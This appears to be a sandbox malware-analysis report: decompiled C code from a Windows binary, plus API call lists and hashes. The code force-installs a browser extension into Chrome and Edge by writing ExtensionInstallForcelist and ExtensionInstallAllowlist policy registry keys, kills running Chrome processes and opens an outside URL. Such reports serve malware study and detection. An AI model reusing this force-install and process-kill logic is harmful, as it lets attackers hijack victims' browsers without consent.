                                                                                                						 *((intOrPtr*)(_t350 - 0x75))();
                                                                                                						E01002B10(_t371, _t470 - 0x210, L"%s\\Google\\Chrome\\User Data\\%s\\Extensions\\ecffbknobglofafinobbcmaionnihcma", _t371);
                                                                                                						_t475 = _t475 + 0x10;
                                                                                                						if(GetFileAttributesW(_t470 - 0x210) == 0xffffffff) {
                                                                                                							 *((intOrPtr*)(_t470 - 0x3778)) = _t470 - 0xa5c;
                                                                                                							 *((intOrPtr*)(_t470 - 0x377c)) = _t470 +  *(_t470 - 0x353c) * 0x208 - 0x3328;
                                                                                                							 *((intOrPtr*)(_t470 - 0x3780)) =  *((intOrPtr*)(_t470 - 0x377c));
                                                                                                							 *(_t470 - 0x353c) =  *(_t470 - 0x353c) + 1;
                                                                                                							 *((intOrPtr*)(_t470 - 0x3784)) =  *((intOrPtr*)(_t470 - 0x3780));
                                                                                                							do {
                                                                                                								 *((short*)(_t470 - 0x3786)) =  *((intOrPtr*)( *((intOrPtr*)(_t470 - 0x3778))));
                                                                                                								 *((short*)( *((intOrPtr*)(_t470 - 0x3780)))) =  *((intOrPtr*)(_t470 - 0x3786));
                                                                                                								 *((intOrPtr*)(_t470 - 0x3778)) =  *((intOrPtr*)(_t470 - 0x3778)) + 2;
                                                                                                								 *((intOrPtr*)(_t470 - 0x3780)) =  *((intOrPtr*)(_t470 - 0x3780)) + 2;
                                                                                                							} while ( *((short*)(_t470 - 0x3786)) != 0);
                                                                                                						}
                                                                                                					}
                                                                                                					_t371 = _t470 - 0xa88;
                                                                                                					_t426 =  *(_t470 - 0x332c);
                                                                                                					_t254 = FindNextFileW( *(_t470 - 0x332c), _t470 - 0xa88); // executed
                                                                                                					_t493 = _t254;
                                                                                                				} while (_t493 != 0);
                                                                                                				if(_t493 != 0 && _t493 == 0) {
                                                                                                					0xffca();
                                                                                                				}
                                                                                                				if( *(_t470 - 0x353c) != 0) {
                                                                                                					if(__eflags > 0 && __eflags <= 0) {
                                                                                                						0x2d28149();
                                                                                                					}
                                                                                                					_t255 =  *0x101d264; // 0x145f9e0
                                                                                                					_t376 = _t470 - 0x3538;
                                                                                                					E01002B10(_t376, _t376, L"%s\\ServiceApp\\apps-helper", _t255);
                                                                                                					_t476 = _t475 + 0xc;
                                                                                                					asm("clc");
                                                                                                					if(__eflags < 0) {
                                                                                                						0xc995aaae();
                                                                                                					}
                                                                                                					E01002B10(_t376, _t470 - 0x3748, L"%s\\edge.crx", _t470 - 0x3538);
                                                                                                					_t477 = _t476 + 0xc;
                                                                                                					asm("clc");
                                                                                                					if(__eflags < 0) {
                                                                                                						0xfc8085ce();
                                                                                                					}
                                                                                                					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Policies\\Google\\Chrome\\ExtensionInstallAllowlist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
                                                                                                					if(__eflags != 0) {
                                                                                                						if (__eflags != 0) goto L55;
                                                                                                						__eflags = _t376 + _t470;
                                                                                                					}
                                                                                                					_t377 = _t470 - 0x3748;
                                                                                                					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"path", _t377); // executed
                                                                                                					if(__eflags != 0 && __eflags == 0) {
                                                                                                						0x100();
                                                                                                					}
                                                                                                					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"version", L"1.0"); // executed
                                                                                                					asm("clc");
                                                                                                					if(__eflags < 0) {
                                                                                                						0xb995ab2b();
                                                                                                					}
                                                                                                					E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"path", _t470 - 0x3748); // executed
                                                                                                					if(__eflags != 0 && __eflags == 0) {
                                                                                                						0x100();
                                                                                                					}
                                                                                                					E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"version", L"1.0"); // executed
                                                                                                					asm("clc");
                                                                                                					if(__eflags < 0) {
                                                                                                						0xdd85ab6a();
                                                                                                					}
                                                                                                					_t265 = E01001330(_t368, _t468, L" /IM chrome.exe", _t470 - 0x424); // executed
                                                                                                					if(__eflags != 0) {
                                                                                                						if (__eflags != 0) goto L69;
                                                                                                						__eflags = _t265 + _t470;
                                                                                                					}
                                                                                                					Sleep(0x2bc); // executed
                                                                                                					asm("clc");
                                                                                                					if(__eflags < 0) {
                                                                                                						0xb585e590();
                                                                                                					}
                                                                                                					 *(_t470 - 0x374c) = 0;
                                                                                                					while(1) {
                                                                                                						_t429 =  *(_t470 - 0x374c);
                                                                                                						__eflags = _t429 -  *(_t470 - 0x353c);
                                                                                                						if(__eflags >= 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						if (__eflags == 0) goto L78;
                                                                                                						__eflags = _t468 +  *((intOrPtr*)(_t470 + 1));
                                                                                                					}
                                                                                                					if(__eflags > 0 && __eflags <= 0) {
                                                                                                						0xc9b0a3fd();
                                                                                                					}
                                                                                                					 *(_t470 - 0x3750) = 0;
                                                                                                					__eflags =  *(_t470 - 0x3750) -  *(_t470 - 0x353c);
                                                                                                					if(__eflags >= 0) {
                                                                                                						Sleep(0x1388); // executed
                                                                                                						if(__eflags != 0 && __eflags == 0) {
                                                                                                						}
                                                                                                						E01001270(__eflags, 0x80000002, L"SOFTWARE\\Policies\\Google\\Chrome\\ExtensionInstallForcelist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
                                                                                                						asm("clc");
                                                                                                						if(__eflags < 0) {
                                                                                                							0x27887eb();
                                                                                                						}
                                                                                                						E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Policies\\Google\\Chrome\\ExtensionInstallForcelist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
                                                                                                						Sleep(0x1388); // executed
                                                                                                						_t426 = _t470 - 0x424;
                                                                                                						E01001330(_t368, _t468, L" /F /IM chrome.exe /T", _t470 - 0x424); // executed
                                                                                                						if(__eflags != 0 && __eflags == 0) {
                                                                                                							0xfc4d();
                                                                                                						}
                                                                                                						_t269 = 0;
                                                                                                						__eflags = 0;
                                                                                                						goto L107;
                                                                                                					} else {
                                                                                                						if(__eflags != 0 && __eflags == 0) {
                                                                                                							0xc9b0b3ef();
                                                                                                						}
                                                                                                						_t431 =  *(_t470 - 0x3750) * 0x208;
                                                                                                						__eflags = _t431;
                                                                                                						_push(_t470 + _t431 - 0x3328);
                                                                                                						_t381 =  *0x101d264; // 0x145f9e0
                                                                                                						_t432 = _t470 - 0x630;
                                                                                                						_t272 = E01002B10(_t381, _t432, L"%s\\Google\\Chrome\\User Data\\%s\\Extensions\\ecffbknobglofafinobbcmaionnihcma\\1.0_0\\src\\jquery-3.5.1.min.js", _t381);
                                                                                                						_t479 = _t477 + 0x10;
                                                                                                						if(__eflags != 0 && __eflags == 0) {
                                                                                                						}
                                                                                                						while(1) {
                                                                                                							_t368 = _t368 >> 0xff;
                                                                                                							_t102 = _t381 + 2; // 0x2e0000
                                                                                                							__eflags = _t272 - 1 -  *_t102;
                                                                                                							if(_t272 - 1 !=  *_t102) {
                                                                                                								goto L117;
                                                                                                							}
                                                                                                							 *(_t470 - 0x3fbc) =  *(_t470 - 0x3fbc) + 4;
                                                                                                							 *((intOrPtr*)(_t470 - 0x3fb8)) =  *((intOrPtr*)(_t470 - 0x3fb8)) + 4;
                                                                                                							__eflags =  *((short*)(_t470 - 0x3fc0));
                                                                                                							if( *((short*)(_t470 - 0x3fc0)) != 0) {
                                                                                                								L111:
                                                                                                								_t432 =  *(_t470 - 0x3fbc);
                                                                                                								_t279 =  *_t432;
                                                                                                								 *((short*)(_t470 - 0x3fbe)) = _t279;
                                                                                                								__eflags = _t279 -  *((intOrPtr*)( *((intOrPtr*)(_t470 - 0x3fb8))));
                                                                                                								if(_t279 !=  *((intOrPtr*)( *((intOrPtr*)(_t470 - 0x3fb8))))) {
                                                                                                									goto L117;
                                                                                                								} else {
                                                                                                									__eflags =  *((short*)(_t470 - 0x3fbe));
                                                                                                									if( *((short*)(_t470 - 0x3fbe)) == 0) {
                                                                                                										goto L116;
                                                                                                									} else {
                                                                                                										_t432 =  *(_t470 - 0x3fbc);
                                                                                                										_t272 =  *((intOrPtr*)(_t432 + 2));
                                                                                                										 *((short*)(_t470 - 0x3fc0)) = _t272;
                                                                                                										_t381 =  *((intOrPtr*)(_t470 - 0x3fb8));
                                                                                                										continue;
                                                                                                									}
                                                                                                								}
                                                                                                							} else {
                                                                                                								L116:
                                                                                                								 *(_t470 - 0x3fc4) = 0;
                                                                                                							}
                                                                                                							L118:
                                                                                                							 *(_t470 - 0x3fc8) =  *(_t470 - 0x3fc4);
                                                                                                							__eflags =  *(_t470 - 0x3fc8);
                                                                                                							if( *(_t470 - 0x3fc8) != 0) {
                                                                                                								 *((intOrPtr*)(_t470 - 0x3fcc)) = L"..";
                                                                                                								 *(_t470 - 0x3fd0) = _t470 - 0x3d74;
                                                                                                								while(1) {
                                                                                                									_t452 =  *(_t470 - 0x3fd0);
                                                                                                									_t340 =  *_t452;
                                                                                                									 *((short*)(_t470 - 0x3fd2)) = _t340;
                                                                                                									__eflags = _t340 -  *((intOrPtr*)( *((intOrPtr*)(_t470 - 0x3fcc))));
                                                                                                									if(_t340 !=  *((intOrPtr*)( *((intOrPtr*)(_t470 - 0x3fcc))))) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags =  *((short*)(_t470 - 0x3fd2));
                                                                                                									if( *((short*)(_t470 - 0x3fd2)) == 0) {
                                                                                                										L124:
                                                                                                										 *(_t470 - 0x3fd8) = 0;
                                                                                                									} else {
                                                                                                										_t452 =  *(_t470 - 0x3fd0);
                                                                                                										_t343 =  *((intOrPtr*)(_t452 + 2));
                                                                                                										 *((short*)(_t470 - 0x3fd4)) = _t343;
                                                                                                										_t124 =  *((intOrPtr*)(_t470 - 0x3fcc)) + 2; // 0x2e
                                                                                                										__eflags = _t343 -  *_t124;
                                                                                                										if(_t343 !=  *_t124) {
                                                                                                											break;
                                                                                                										} else {
                                                                                                											 *(_t470 - 0x3fd0) =  *(_t470 - 0x3fd0) + 4;
                                                                                                											 *((intOrPtr*)(_t470 - 0x3fcc)) =  *((intOrPtr*)(_t470 - 0x3fcc)) + 4;
                                                                                                											__eflags =  *((short*)(_t470 - 0x3fd4));
                                                                                                											if( *((short*)(_t470 - 0x3fd4)) != 0) {
                                                                                                												continue;
                                                                                                											} else {
                                                                                                												goto L124;
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                									L126:
                                                                                                									 *(_t470 - 0x3fdc) =  *(_t470 - 0x3fd8);
                                                                                                									__eflags =  *(_t470 - 0x3fdc);
                                                                                                									if(__eflags != 0) {
                                                                                                										if(__eflags != 0 && __eflags == 0) {
                                                                                                											0xffc2();
                                                                                                										}
                                                                                                										E01002B40(_t470 - 0x3938, _t470 - 0x3d74);
                                                                                                										_t479 = _t479 + 8;
                                                                                                										if(__eflags != 0 && __eflags == 0) {
                                                                                                										}
                                                                                                									}
                                                                                                									while(1) {
                                                                                                										L133:
                                                                                                										_t382 =  *(_t470 - 0x3fac);
                                                                                                										_t277 = FindNextFileW(_t382, _t470 - 0x3da0);
                                                                                                										__eflags = _t277;
                                                                                                										if(__eflags == 0) {
                                                                                                											break;
                                                                                                										}
                                                                                                										__eflags =  *(_t470 - 0x3da0) - 0x10;
                                                                                                										 *_t277();
                                                                                                										if(__eflags == 0) {
                                                                                                											 *((intOrPtr*)(_t470 - 0x3fb8)) = ".";
                                                                                                											 *(_t470 - 0x3fbc) = _t470 - 0x3d74;
                                                                                                											goto L111;
                                                                                                										}
                                                                                                									}
                                                                                                									_t433 =  *(_t470 - 0x3fac);
                                                                                                									FindClose(_t433);
                                                                                                									if(__eflags != 0 && __eflags == 0) {
                                                                                                										0x8589();
                                                                                                									}
                                                                                                									__eflags = 0;
                                                                                                									 *(_t470 - 0x3730) = 0;
                                                                                                									_push(0x206);
                                                                                                									 *_t433 = _t382 +  *_t433;
                                                                                                									_push(_t470 - 0x372e);
                                                                                                									E01007BE0(_t467);
                                                                                                									_push(_t470 - 0x3938);
                                                                                                									_t390 = _t470 - 0x3730;
                                                                                                									E01002B10(_t390, _t390, L"%s\\Microsoft\\EdgeCore\\%s\\msedge.exe", _t470 - 0x420);
                                                                                                									_t481 = _t479 + 0x1c;
                                                                                                									_t435 = _t470 - 0x3730;
                                                                                                									_t286 = GetFileAttributesW(_t435); // executed
                                                                                                									__eflags = _t286 - 0xffffffff;
                                                                                                									if(__eflags != 0) {
                                                                                                										if(__eflags != 0 && __eflags == 0) {
                                                                                                											0xfeeca783();
                                                                                                										}
                                                                                                										_t287 = _t470 - 0x214;
                                                                                                										 *((intOrPtr*)(_t287 + 0x68))();
                                                                                                										asm("aas");
                                                                                                										 *_t467 =  *_t467 + _t390;
                                                                                                										 *_t435 =  *_t435 + _t390;
                                                                                                										__eflags =  *_t435;
                                                                                                										 *(_t470 - 0x3b50) = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Policies\\Microsoft\\Edge\\ExtensionInstallAllowlist", ??, ??, ??);
                                                                                                										if(__eflags != 0 && __eflags == 0) {
                                                                                                										}
                                                                                                										__eflags =  *(_t470 - 0x3b50);
                                                                                                										_t150 = _t470 + 0x2f;
                                                                                                										 *_t150 = _t435 +  *(_t470 + 0x2f);
                                                                                                										__eflags =  *_t150;
                                                                                                									} else {
                                                                                                										asm("clc");
                                                                                                										if(__eflags < 0) {
                                                                                                											0xeac055d1();
                                                                                                										}
                                                                                                										_t311 = 0;
                                                                                                									}
                                                                                                									__eflags =  *(_t470 - 4) ^ _t470;
                                                                                                									return E01002B7C(_t311, _t368,  *(_t470 - 4) ^ _t470, _t440, _t467, _t468);
                                                                                                									goto L290;
                                                                                                								}
                                                                                                								asm("sbb edx, edx");
                                                                                                								asm("sbb edx, 0xffffffff");
                                                                                                								 *(_t470 - 0x3fd8) = _t452;
                                                                                                								goto L126;
                                                                                                							}
                                                                                                							goto L133;
                                                                                                							L117:
                                                                                                							asm("sbb edx, edx");
                                                                                                							asm("sbb edx, 0xffffffff");
                                                                                                							 *(_t470 - 0x3fc4) = _t432;
                                                                                                							goto L118;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t269 = 0;
                                                                                                					L107:
                                                                                                					return E01002B7C(_t269, _t368,  *(_t470 - 4) ^ _t470, _t426, _t467, _t468);
                                                                                                				}
                                                                                                				L290:
                                                                                                			}
















































                                                                                                0x01001a1a
                                                                                                0x01001a1a
                                                                                                0x01001a1a
                                                                                                0x01001a1a
                                                                                                0x01001a1a
                                                                                                0x01001a1d
                                                                                                0x01001a22
                                                                                                0x01001a23
                                                                                                0x01001a25
                                                                                                0x01001a25
                                                                                                0x01001a27
                                                                                                0x01001a2b
                                                                                                0x01001a2b
                                                                                                0x01001a35
                                                                                                0x01001a43
                                                                                                0x01001a49
                                                                                                0x01001a4a
                                                                                                0x01001a4c
                                                                                                0x01001a4c
                                                                                                0x01001a53
                                                                                                0x01001a59
                                                                                                0x01001a59
                                                                                                0x01001a5e
                                                                                                0x01001a71
                                                                                                0x01001a76
                                                                                                0x01001a79
                                                                                                0x01001a79
                                                                                                0x01001a8c
                                                                                                0x01001a92
                                                                                                0x01001a98
                                                                                                0x01001a98
                                                                                                0x01001a9d
                                                                                                0x01001aa7
                                                                                                0x01001ab2
                                                                                                0x01001ab9
                                                                                                0x01001abe
                                                                                                0x01001ac8
                                                                                                0x01001ace
                                                                                                0x01001ad1
                                                                                                0x01001ad7
                                                                                                0x01001adb
                                                                                                0x01001adb
                                                                                                0x01001add
                                                                                                0x01001afa
                                                                                                0x01001b06
                                                                                                0x01001b15
                                                                                                0x01001b21
                                                                                                0x01001b27
                                                                                                0x01001b30
                                                                                                0x01001b44
                                                                                                0x01001b50
                                                                                                0x01001b5c
                                                                                                0x01001b5f
                                                                                                0x01001b65
                                                                                                0x01001b65
                                                                                                0x01001b6f
                                                                                                0x01001b73
                                                                                                0x01001b73
                                                                                                0x01001b6f
                                                                                                0x01001b75
                                                                                                0x01001b79
                                                                                                0x01001b79
                                                                                                0x01001b7b
                                                                                                0x01001b7b
                                                                                                0x01001b7f
                                                                                                0x01001b7f
                                                                                                0x01001b8c
                                                                                                0x01001b91
                                                                                                0x01001b94
                                                                                                0x01001b96
                                                                                                0x01001b9c
                                                                                                0x01001b9d
                                                                                                0x01001b9f
                                                                                                0x01001b9f
                                                                                                0x01001ba1
                                                                                                0x01001ba6
                                                                                                0x01001bbb
                                                                                                0x01001bc0
                                                                                                0x01001bd3
                                                                                                0x01001bdf
                                                                                                0x01001bf8
                                                                                                0x01001c04
                                                                                                0x01001c13
                                                                                                0x01001c1f
                                                                                                0x01001c25
                                                                                                0x01001c2e
                                                                                                0x01001c42
                                                                                                0x01001c4e
                                                                                                0x01001c5d
                                                                                                0x01001c63
                                                                                                0x01001c25
                                                                                                0x01001bd3
                                                                                                0x01001c6d
                                                                                                0x01001c74
                                                                                                0x01001c7b
                                                                                                0x01001c81
                                                                                                0x01001c81
                                                                                                0x01001c89
                                                                                                0x01001c8d
                                                                                                0x01001c8d
                                                                                                0x01001c96
                                                                                                0x01001c9f
                                                                                                0x01001ca3
                                                                                                0x01001ca3
                                                                                                0x01001ca4
                                                                                                0x01001caf
                                                                                                0x01001cb6
                                                                                                0x01001cbb
                                                                                                0x01001cbe
                                                                                                0x01001cbf
                                                                                                0x01001cc1
                                                                                                0x01001cc1
                                                                                                0x01001cd6
                                                                                                0x01001cdb
                                                                                                0x01001cde
                                                                                                0x01001cdf
                                                                                                0x01001ce1
                                                                                                0x01001ce1
                                                                                                0x01001cf7
                                                                                                0x01001cfc
                                                                                                0x01001cfe
                                                                                                0x01001cff
                                                                                                0x01001cff
                                                                                                0x01001d01
                                                                                                0x01001d17
                                                                                                0x01001d1c
                                                                                                0x01001d20
                                                                                                0x01001d20
                                                                                                0x01001d36
                                                                                                0x01001d3b
                                                                                                0x01001d3c
                                                                                                0x01001d3e
                                                                                                0x01001d3e
                                                                                                0x01001d56
                                                                                                0x01001d5b
                                                                                                0x01001d5f
                                                                                                0x01001d5f
                                                                                                0x01001d75
                                                                                                0x01001d7a
                                                                                                0x01001d7b
                                                                                                0x01001d7d
                                                                                                0x01001d7d
                                                                                                0x01001d8b
                                                                                                0x01001d90
                                                                                                0x01001d92
                                                                                                0x01001d93
                                                                                                0x01001d93
                                                                                                0x01001d9a
                                                                                                0x01001da0
                                                                                                0x01001da1
                                                                                                0x01001da3
                                                                                                0x01001da3
                                                                                                0x01001da5
                                                                                                0x01001dc0
                                                                                                0x01001dc0
                                                                                                0x01001dc6
                                                                                                0x01001dcc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01001dce
                                                                                                0x01001dcf
                                                                                                0x01001dcf
                                                                                                0x01001e2d
                                                                                                0x01001e31
                                                                                                0x01001e31
                                                                                                0x01001e32
                                                                                                0x01001e53
                                                                                                0x01001e59
                                                                                                0x01001ed7
                                                                                                0x01001edd
                                                                                                0x01001edd
                                                                                                0x01001ef6
                                                                                                0x01001efb
                                                                                                0x01001efc
                                                                                                0x01001efe
                                                                                                0x01001efe
                                                                                                0x01001f14
                                                                                                0x01001f1e
                                                                                                0x01001f24
                                                                                                0x01001f30
                                                                                                0x01001f35
                                                                                                0x01001f39
                                                                                                0x01001f39
                                                                                                0x01001f3b
                                                                                                0x01001f3b
                                                                                                0x00000000
                                                                                                0x01001e5b
                                                                                                0x01001e5b
                                                                                                0x01001e5f
                                                                                                0x01001e5f
                                                                                                0x01001e66
                                                                                                0x01001e66
                                                                                                0x01001e73
                                                                                                0x01001e74
                                                                                                0x01001e80
                                                                                                0x01001e87
                                                                                                0x01001e8c
                                                                                                0x01001e8f
                                                                                                0x01001e8f
                                                                                                0x01002050
                                                                                                0x01002051
                                                                                                0x01002054
                                                                                                0x01002054
                                                                                                0x01002058
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0100205a
                                                                                                0x01002061
                                                                                                0x01002068
                                                                                                0x01002070
                                                                                                0x01002018
                                                                                                0x01002018
                                                                                                0x0100201e
                                                                                                0x01002021
                                                                                                0x0100202e
                                                                                                0x01002031
                                                                                                0x00000000
                                                                                                0x01002033
                                                                                                0x01002033
                                                                                                0x0100203b
                                                                                                0x00000000
                                                                                                0x0100203d
                                                                                                0x0100203d
                                                                                                0x01002043
                                                                                                0x01002047
                                                                                                0x0100204e
                                                                                                0x00000000
                                                                                                0x0100204e
                                                                                                0x0100203b
                                                                                                0x01002072
                                                                                                0x01002072
                                                                                                0x01002072
                                                                                                0x01002072
                                                                                                0x01002089
                                                                                                0x0100208f
                                                                                                0x01002095
                                                                                                0x0100209c
                                                                                                0x010020a2
                                                                                                0x010020b2
                                                                                                0x010020b8
                                                                                                0x010020b8
                                                                                                0x010020be
                                                                                                0x010020c1
                                                                                                0x010020ce
                                                                                                0x010020d1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010020d3
                                                                                                0x010020db
                                                                                                0x01002112
                                                                                                0x01002112
                                                                                                0x010020dd
                                                                                                0x010020dd
                                                                                                0x010020e3
                                                                                                0x010020e7
                                                                                                0x010020f4
                                                                                                0x010020f4
                                                                                                0x010020f8
                                                                                                0x00000000
                                                                                                0x010020fa
                                                                                                0x010020fa
                                                                                                0x01002101
                                                                                                0x01002108
                                                                                                0x01002110
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01002110
                                                                                                0x010020f8
                                                                                                0x01002129
                                                                                                0x0100212f
                                                                                                0x01002135
                                                                                                0x0100213c
                                                                                                0x0100213e
                                                                                                0x01002142
                                                                                                0x01002142
                                                                                                0x01002152
                                                                                                0x01002157
                                                                                                0x0100215a
                                                                                                0x0100215a
                                                                                                0x0100215a
                                                                                                0x0100215f
                                                                                                0x0100215f
                                                                                                0x01002166
                                                                                                0x0100216d
                                                                                                0x01002173
                                                                                                0x01002175
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01001ff5
                                                                                                0x01001ffa
                                                                                                0x01001ffc
                                                                                                0x01002002
                                                                                                0x01002012
                                                                                                0x00000000
                                                                                                0x01002012
                                                                                                0x01001ffc
                                                                                                0x0100217b
                                                                                                0x01002182
                                                                                                0x01002188
                                                                                                0x0100218c
                                                                                                0x0100218c
                                                                                                0x0100218e
                                                                                                0x01002190
                                                                                                0x01002197
                                                                                                0x0100219b
                                                                                                0x010021a4
                                                                                                0x010021a5
                                                                                                0x010021b3
                                                                                                0x010021c0
                                                                                                0x010021c7
                                                                                                0x010021cc
                                                                                                0x010021cf
                                                                                                0x010021d6
                                                                                                0x010021dc
                                                                                                0x010021df
                                                                                                0x010021ed
                                                                                                0x010021f1
                                                                                                0x010021f1
                                                                                                0x010021f2
                                                                                                0x010021f7
                                                                                                0x010021fa
                                                                                                0x010021fb
                                                                                                0x010021fd
                                                                                                0x010021fd
                                                                                                0x01002210
                                                                                                0x01002216
                                                                                                0x01002216
                                                                                                0x0100221b
                                                                                                0x01002221
                                                                                                0x01002221
                                                                                                0x01002221
                                                                                                0x010021e1
                                                                                                0x010021e1
                                                                                                0x010021e2
                                                                                                0x010021e4
                                                                                                0x010021e4
                                                                                                0x010021e6
                                                                                                0x010021e6
                                                                                                0x01002931
                                                                                                0x0100293b
                                                                                                0x00000000
                                                                                                0x0100293b
                                                                                                0x0100211e
                                                                                                0x01002120
                                                                                                0x01002123
                                                                                                0x00000000
                                                                                                0x01002123
                                                                                                0x00000000
                                                                                                0x0100207e
                                                                                                0x0100207e
                                                                                                0x01002080
                                                                                                0x01002083
                                                                                                0x00000000
                                                                                                0x01002083
                                                                                                0x01002050
                                                                                                0x01001c98
                                                                                                0x01001c98
                                                                                                0x01001f3d
                                                                                                0x01001f4a
                                                                                                0x01001f4a
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,?, https://getfiles.wiki/welcome.php,00000000,00000005), ref: 01001A43
                                                                                                • Sleep.KERNELBASE(00001B58), ref: 01001A53
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExecuteShellSleep
                                                                                                • String ID: https://getfiles.wiki/welcome.php$open
                                                                                                • API String ID: 4194306370-4115781834
                                                                                                • Opcode ID: 82d067c76a3103ea2cff88c41af12e92ee3c1257c928200fcdf596e1e7d50217
                                                                                                • Instruction ID: 125e6907833832c6737bf5b3a3a5f1616b06ecc2605df75889375059affa2ba6
                                                                                                • Opcode Fuzzy Hash: 82d067c76a3103ea2cff88c41af12e92ee3c1257c928200fcdf596e1e7d50217
                                                                                                • Instruction Fuzzy Hash: 75E08671B48211ABF7775BE59C0EBA87A90BB23755F0903C4F2D1990C3EDB9D2488B25
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1504 1002bec-1002bf8 1505 1002bfa-1002c07 call 1003940 1504->1505 1506 1002c0f-1002c16 call 10034ef 1504->1506 1505->1506 1513 1002c09 1505->1513 1511 1002c18-1002c1e call 10036b1 1506->1511 1512 1002c1f-1002c22 ExitThread 1506->1512 1511->1512 1513->1506
                                                                                                C-Code - Quality: 75%
                                                                                                			E01002BEC(long _a4) {
                                                                                                				void* _t6;
                                                                                                				void* _t9;
                                                                                                				void* _t10;
                                                                                                
                                                                                                				_t11 =  *0x101e420;
                                                                                                				if( *0x101e420 != 0 && E01003940(_t11, 0x101e420) != 0) {
                                                                                                					 *0x101e420();
                                                                                                				}
                                                                                                				if(E010034EF(_t6) != 0) {
                                                                                                					E010036B1(_t6, _t9, _t10, _t2);
                                                                                                				}
                                                                                                				ExitThread(_a4);
                                                                                                			}






                                                                                                0x01002bf1
                                                                                                0x01002bf8
                                                                                                0x01002c09
                                                                                                0x01002c09
                                                                                                0x01002c16
                                                                                                0x01002c19
                                                                                                0x01002c1e
                                                                                                0x01002c22

                                                                                                APIs
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 01002BFF
                                                                                                  • Part of subcall function 01003940: __FindPESection.LIBCMT ref: 0100399B
                                                                                                • __getptd_noexit.LIBCMT ref: 01002C0F
                                                                                                • __freeptd.LIBCMT ref: 01002C19
                                                                                                • ExitThread.KERNEL32 ref: 01002C22
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                • String ID:
                                                                                                • API String ID: 3182216644-0
                                                                                                • Opcode ID: 1765f7136e157b40a43bed603cf334957c1fd1ccd69ed8d3ba354b6185930a34
                                                                                                • Instruction ID: 18fe52377fac26b7c432b7086aaeaece24fc7935f6082dcf8b2c963badcd4a78
                                                                                                • Opcode Fuzzy Hash: 1765f7136e157b40a43bed603cf334957c1fd1ccd69ed8d3ba354b6185930a34
                                                                                                • Instruction Fuzzy Hash: C7D0173104020BABF6732BAAE90DA5A3AD9BB45624F050468BBC4885E8DF69E4D5C624
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
